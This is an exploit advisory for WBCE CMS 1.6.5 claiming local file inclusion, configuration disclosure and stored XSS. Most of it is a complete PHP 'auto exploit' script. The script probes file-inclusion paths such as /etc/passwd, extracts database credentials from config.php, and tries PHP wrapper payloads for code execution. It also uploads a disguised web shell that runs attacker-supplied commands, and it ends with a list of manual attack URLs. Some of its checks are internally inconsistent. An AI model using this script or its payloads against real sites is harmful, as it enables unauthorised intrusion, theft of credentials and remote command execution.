=============================================================================================================================================
| # Title     : WBCE CMS 1.6.5 LFI / Config Disclosure / Stored XSS                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5                                                                         |
=============================================================================================================================================

[+] References :  

[+] Summary    : WBCE CMS frontend loader includes template files without sanitization. This allows Local File Inclusion, reading configuration files, and XSS via crafted templates.

Impact:
--------
- Disclosure of database credentials (config.php)
- Read arbitrary files (/etc/passwd, Windows hosts)
- Stored XSS via template injection

Vulnerable Code:
----------------
require WB_PATH . '/templates/' . TEMPLATE . '/include.php';

POC : php exploit.php http://target.com

<?php
/**
 * WBCE CMS Auto Exploit 
 */
error_reporting(0);

if($argc < 2) {
    die("Usage: php {$argv[0]} <url>\n");
}

$url = rtrim($argv[1], '/');

echo "[*] Target: $url\n";

// Quick LFI test
function testLFI($u) {
    $files = [
        '/etc/passwd',
        '/proc/self/environ',
        '/var/log/apache2/access.log',
        '/windows/win.ini',
        '../../../../../../etc/passwd',
    ];
    
    foreach($files as $file) {
        $test = $u . "/index.php?TEMPLATE=" . urlencode($file);
        $resp = @file_get_contents($test);
        if($resp && (strpos($resp, 'root:') !== false || strpos($resp, '[fonts]') !== false)) {
            echo "[+] LFI FOUND: $file\n";
            return $test;
        }
    }
    return false;
}

// Try to read config
function getConfig($u) {
    $paths = [
        '/config.php',
        '/../config.php',
        '/../../config.php',
        '/../../../config.php',
    ];
    
    foreach($paths as $p) {
        $test = $u . $p;
        $resp = @file_get_contents($test);
        if($resp && strpos($resp, 'DB_') !== false) {
            echo "[+] CONFIG FOUND: $p\n";
            
            // Extract DB info
            preg_match_all('/define\(\s*[\'"](DB_[A-Z_]+)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)/', $resp, $matches);
            
            if(!empty($matches[1])) {
                echo "[+] DATABASE CREDS:\n";
                for($i=0; $i<count($matches[1]); $i++) {
                    echo "    {$matches[1][$i]}: {$matches[2][$i]}\n";
                }
            }
            
            return $resp;
        }
    }
    return false;
}

// Try to upload shell via POST
function tryUpload($u) {
    $uploadUrl = $u . "/admin/media/upload.php";
    
    // Simple shell
    $shell = '<?php if(isset($_GET["c"])){echo "<pre>".shell_exec($_GET["c"])."</pre>";}?>';
    
    // Create fake file
    $boundary = "----WebKitFormBoundary".md5(time());
    $data = "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\"shell.jpg.php\"\r\n";
    $data .= "Content-Type: image/jpeg\r\n\r\n";
    $data .= $shell . "\r\n";
    $data .= "--{$boundary}--\r\n";
    
    $ctx = stream_context_create([
        'http' => [
            'method' => 'POST',
            'header' => "Content-Type: multipart/form-data; boundary={$boundary}",
            'content' => $data,
        ]
    ]);
    
    $resp = @file_get_contents($uploadUrl, false, $ctx);
    if($resp) {
        echo "[+] Upload attempted. Check: {$u}/media/shell.jpg.php\n";
        echo "[+] Shell URL: {$u}/media/shell.jpg.php?c=id\n";
    }
}

// Try PHP wrapper RCE
function tryRCE($u) {
    $payloads = [
        '/index.php?TEMPLATE=data://text/plain,<?php echo md5("test");?>',
        '/index.php?TEMPLATE=data://text/plain;base64,PD9waHAgZWNobyBtZDUoInRlc3QiKTs/Pg==',
        '/index.php?TEMPLATE=php://filter/convert.base64-encode/resource=index.php',
    ];
    
    foreach($payloads as $p) {
        $resp = @file_get_contents($u . $p);
        if($resp && strpos($resp, 'e10adc3949ba59abbe56e057f20f883e') !== false) {
            echo "[+] RCE via PHP wrappers!\n";
            return true;
        }
        if($resp && base64_decode($resp) !== false) {
            echo "[+] Possible file read via filter\n";
            return true;
        }
    }
    return false;
}

// Main execution
echo "\n[*] Starting scan...\n";

// Test 1: LFI
if($lfi = testLFI($url)) {
    echo "[!] LFI URL: $lfi\n";
}

// Test 2: Config
if($config = getConfig($url)) {
    echo "[!] Config found\n";
}

// Test 3: RCE
if(tryRCE($url)) {
    echo "[!] RCE possible\n";
}

// Test 4: Upload
echo "[*] Testing upload...\n";
tryUpload($url);

echo "\n[*] Done!\n";
echo "[!] Manual tests to try:\n";
echo "    1. {$url}/admin/ (admin panel)\n";
echo "    2. {$url}/install/ (installer)\n";
echo "    3. {$url}/index.php?TEMPLATE=../../../../../../../etc/passwd%00\n";
echo "    4. {$url}/index.php?TEMPLATE=php://input (POST with PHP code)\n";

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================